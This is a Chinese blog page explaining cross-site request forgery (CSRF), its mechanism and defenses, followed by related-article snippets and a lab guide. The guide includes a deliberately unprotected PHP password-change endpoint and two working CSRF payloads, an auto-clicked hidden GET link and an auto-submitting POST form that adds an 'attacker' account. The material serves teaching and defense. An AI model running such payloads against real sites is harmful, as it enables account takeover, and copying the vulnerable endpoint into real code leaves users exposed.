跨站点请求伪造(CSRF)

最新推荐文章于 2023-01-18 11:25:36 发布
最新推荐文章于 2023-01-18 11:25:36 发布
阅读量2.1k 收藏 1
点赞数 1
文章标签: csrf p2p 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yuwusheng18/article/details/121778975
版权

一、CSRF是什么?

        通过浏览器冒充用户身份向服务器发送伪造请求并成功执行。

二、攻击原理

1、用户正常登入受信任的网站A,输入账号密码登入

2、登入成功网站返回Cookie

3、用户未退出的网站,访问网站B

4、网站B接收到请求,返回恶意代码。并发出一个请求访问站点A ,此时会携带用户的cookie进行访问。

三、 CSRF的危害

CSRF工具特:

攻击时机: Cookie没有过期,

攻击前提: 了解网站接口

攻击难度:大于XSS

危害:修改密码、转账、删除数据

四、如何防护

1、referer校验

        当浏览器向Web  发送请求时,header中有个referer字段表明是从哪里发出的,正常应该从本网站域名发出,登入的时候例外。在网关中防止过滤器进行校验,或者在项目中定义过滤器或拦截器,也可在业务代码中实现。

2、业务二次校验

        添加验证码(短信验证码、图形验证码均可)

        添加系统确认密码(如交易密码)

壮乡码农
关注
flask中的csrf防御机制
FreeSpider
07-17 2138
csrf概念 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站内的信任用户,而CSRF则通过伪装来自受信任用户请求来利用受信任的网站。与XSS攻击相比,CSRF攻击...
跨站请求伪造(CSRF)漏洞详解
CoffeMilk的博客
09-21 1513
跨站请求伪造(Cross-site request forgery 简称:CSRF);是一种冒充受信任用户,向服务器发送非预期请求的攻击方式(它允许攻击者诱使用户执行他们不打算执行的操作;允许攻击者部分绕过同源策略,该策略旨在防止不同网站相互干扰)【CSRF主要利用的是网站对用户网页浏览器的信任】【XSS 利用的是用户对指定网站的信任】。 跨站请求伪造的攻击特性是危害性大但非常隐蔽,攻击者完全可以在用户毫无察觉的情况下发起CSRF攻击。
跨站伪造请求 (CSRF)
KerryRuan的专栏
04-06 817
跨站伪造请求 (CSRF)”攻击可让黑客以受害者的名义在易受攻击的站上运行操作。当易受攻击的站未适当验证请求来源时,便可能出现这个攻击。  这个漏洞的严重性取决于受影响的应用程序的功能,例如,对搜索页面的 CSRF 攻击,严重性低于对转帐页面或概要更新页面的 CSRF 攻击。  这项攻击的执行方式,是强迫受害者的浏览器向易受攻击的站发出 HTTP 请求。如果用户目前已登录受害
CSRF(跨站请求伪造)
无痕的博客
01-18 8708
csrf跨站请求伪造介绍、csrf攻击在dvwa环境中的应用
安全测试之 CSRF 跨站请求伪造
测试界的彭于晏的博客
03-25 6333
CSRF 攻击 CSRF 跨站请求伪造 (Cross—Site Request Forgery):大概可以理解为攻击者盗用了你的身份,以你的名义在恶意网站发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,甚至于购买商品、转账等。 例如:Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户CSRF 攻击攻击原理及过程如下: 1.用户 C 打开浏览
Tomcat怎样防止跨站请求伪造(CSRF) 1
08-08
Tomcat 防止跨站请求伪造CSRF)机制浅析 在 Web 应用开发中,跨站请求伪造CSRF)是一种常见的安全威胁。跨站请求伪造攻击是指攻击者诱骗受信任用户访问恶意网站,从而使得恶意网站能以用户身份对受信任网站执行...
跨站请求伪造(CSRF)
凉茶铺的博客
07-26 8805
是一种对网站的恶意利用,尽管听起来跟XSS跨站脚本攻击有相似,但事实上CSRF与XSS差别很大,XSS利用的是站内的信任用户,而CSRF则是通过伪装来自受信任用户请求来利用受信任的网站。简单理解一种可以被攻击者用来通过用户浏览器冒充用户身份服务器发送伪造请求目标服务器成功执行的漏洞被称之为CSRF漏洞。...
java如何解决跨站请求伪造_跨站请求伪造CSRF
weixin_39620001的博客
02-13 2234
一、前言跨站请求伪造(Cross-SiteRequest Forgeries, CSRF),是指攻击者通过设置好的陷阱,强制对已完成认证的用户进行非预期的个人信息或设定信息等某些状态更新,属于被动攻击;有如下危害:1、利用已通过认证的用户权限更新设定信息;2、利用已通过认证的用户权限购买商品,虚拟货币转账;3、利用已通过认证的用户权限在留言板发表言论;二、攻击原理:第一步:验证用户访问存在CSR...
DVWA 实验报告:3、跨站请求伪造 CSRF
看那白熊
05-14 1831
跨站请求伪造的复现
CSRF--跨站请求伪造
weixin_44940180的博客
08-11 228
原理 攻击者盗用身份用户名义发送恶意请求 可能用到的标签 <link href=" "> <img src=" "> <iframe src=" "> <script src=" "> csrf与xss的区别 GET 分析源码可以看出来检查了 HTTP_REFERER中是否包含SERVER_NAME 所以不能随意构造一个URL诱使管理员击 所以,我们可以将攻击页面命名为192.168.3.3.html就可以绕过了 原本数据库中管理员的密码为
CSRF跨站请求伪造
m0_66618018的博客
11-12 366
CSRF学习笔记
(三)跨站伪造请求CSRF
weixin_43047908的博客
04-04 894
什么是CSRF跨站请求伪造(也称为CSRF)是一个Web安全漏洞,攻击者可以利用该漏洞诱使用户执行他们不打算执行的操作。它允许攻击者部分规避同一原始策略,该策略旨在防止不同的网站相互干扰。 在成功CSRF攻击中,攻击者会导致受害者用户无意中执行操作。例如,这可能是更改其帐户上的电子邮件地址,更改其密码或进行资金转帐。根据操作的性质,攻击者可能能够完全控制用户的帐户。如果受感染的用户在应用程序中具有特权角色,则攻击者可能能够完全控制所有应用程序的数据和功能。 CSRF攻击条件 相关动作。攻击者
CSRF(Cross-Site Request Forgery) 跨站请求伪造
Eason_LYC安全白帽子的成长博客
05-13 1807
WEB安全中CSRF漏洞攻击最为全面的知识总结,直击核心知识,将零散的知识汇总梳理。为深入学习CSRF打下良好基础!
【Web安全】跨站请求伪造CSRF
RexHa的博客
10-14 1170
大多数CSRF攻击发起时,使用的HTML标签都是、、等带src属性的标签,这类标签只能发起一次Get请求而不能发起Post请求,而对于很多网站的应用来说,一些重要操作未严格区分GET和POST,攻击者可以使用GET来请求表单的提交地址。黑客伪造一个假的页面,当用户访问该页面后,黑客就会利用你的身份向第三方站发送一个恶意请求,从而达到某些目的,例如以你的名义发送邮件、发消息,将你卡里的钱转走,删除某篇博客文章等等。如果用户提交了表单,则应重新生成一个Token。
跨站请求伪造
jackpk的专栏
07-27 1317
IBM appscan扫描漏洞--跨站请求伪造   appscan修订建议:   如果要避免 CSRF 攻击,每个请求都应该包含唯一标识,它是攻击者所无法猜测的参数。建议的选项之一是添加取自会话 cookie 的会话标识,使它成为一个参数。服务器必须检查这个参数是否符合会话 cookie,若不符合,便废弃请求攻击者无法猜测这个参数的原因是应用于 cookie 的“同源策略
跨站请求伪造CSRF实验
最新发布
04-03
### 关于跨站请求伪造CSRF)实验的设计与实施 #### 实验目标 通过设计执行一个简单的 CSRF 攻击场景,验证攻击的工作原理以及其可能带来的危害。这有助于理解 CSRF 的本质及其防御方法。 --- #### 实验环境准备 1. **本地开发服务器** 使用 Web 开发框架搭建一个支持用户登录功能的小型应用,例如 PHP 或 Python Flask 应用程序。该应用程序应允许修改用户的某些敏感数据(如密码),以便模拟真实世界中的业务逻辑。 2. **易受攻击的功能模块** 创建一个未加防护的 URL 接口用于更新用户密码或其他操作。例如: ```php <?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'GET') { $new_password = $_GET['password_new']; $confirm_password = $_GET['password_conf']; if ($new_password && $confirm_password && $new_password === $confirm_password) { echo "Password updated successfully!"; // Simulate password update logic here. } else { echo "Error updating password."; } } ?> ``` 3. **恶意页面构建** 构建一个 HTML 页面,其中包含能够触发 CSRF 攻击的内容。此页面可以通过诱导受害者访问来完成攻击过程。 --- #### 实现步骤 ##### 方法一:基于 GET 请求CSRF 测试 创建一个 HTML 文件,在文件中嵌入超链接或自动加载脚本以发起 CSRF 请求: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Test</title> </head> <body> <!-- 隐蔽的超链接 --> <a href="http://localhost/csrf_vulnerable_app/change_password.php?password_new=hacked&password_conf=hacked" style="display:none;" id="csrf-link"></a> <!-- 自动击链接 --> <script> document.getElementById('csrf-link').click(); </script> </body> </html> ``` 上述代码会在用户打开页面时立即发送一个 GET 请求到指定的目标地址[^4]。 ##### 方法二:基于 POST 请求CSRF 测试 如果目标接口仅接受 POST 请求,则可通过 `<form>` 表单提交方式实现 CSRF 攻击: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Form Attack</title> </head> <body onload="document.forms[0].submit()"> <form action="http://localhost/csrf_vulnerable_app/update_user.php" method="POST"> <input type="hidden" name="act" value="add"/> <input type="hidden" name="username" value="attacker"/> <input type="hidden" name="password" value="hackedpass"/> <input type="hidden" name="password2" value="hackedpass"/> <input type="hidden" name="button" value="%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"/> <input type="hidden" name="userid" value="0"/> </form> </body> </html> ``` 当受害者浏览这个恶意页面时,浏览器会自动向目标提交表单数据[^3]。 --- #### 安全测试注意事项 在实际环境中进行此类测试前需获得授权,以免触犯法律。此外,建议使用虚拟机隔离测试网络,防止意外影响其他系统资源。 --- #### 防御措施概述 为了有效抵御 CSRF 攻击,可采取以下策略之一或多组合使用: - 添加一次性令牌(Token)校验机制; - 设置严格的 Referer 和 Origin 头部检查; - 启用 SameSite Cookie 属性限制第三方调用行为[^1]。 --- ### 结论 通过对 CSRF 漏洞的学习和实践,可以更深刻认识到这类威胁的存在形式及潜在风险,掌握相应的缓解手段。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值